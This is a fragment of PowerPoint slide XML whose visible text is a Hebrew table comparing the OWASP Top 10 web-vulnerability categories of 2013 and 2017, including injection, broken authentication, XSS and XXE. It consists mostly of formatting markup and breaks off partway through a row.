                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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rgbClr val="83276B"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – הזרקת קוד זדוני (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A1:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – הזרקת קוד זדוני (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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xmlns="" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>    </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – הזדהות שבורה ומנגנון</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> ניהול שיחה</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A2:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – הזדהות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> שבורה</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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xmlns="" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (XSS)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – חשיפת מידע רגיש</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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xmlns="" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>אזכור ישיר לרכיב לא מאובטח </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[אוחד עם </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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rgbClr val="4E8541">
                        <a:alpha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a:solidFill>
                            <a:schemeClr val="bg1">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a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1">
                            <a:lumMod val="50000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="18000" marR="18000" marT="18000" marB="180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noFill/>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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A4:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – ישויות </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> חיצוניות</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XXE</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="83276B"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[חדש]</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="360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rgbClr val="83276B">
                        <a:alpha val="20000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="335280">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he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – ניהול</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="950" b="1" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> תצורה לא מאובטח</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="950" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="36000" marR="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a:solidFill>
                            <a:schemeClr val="bg1">
                              <a:lumMod val="50000"/>
                            </a:schemeClr>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
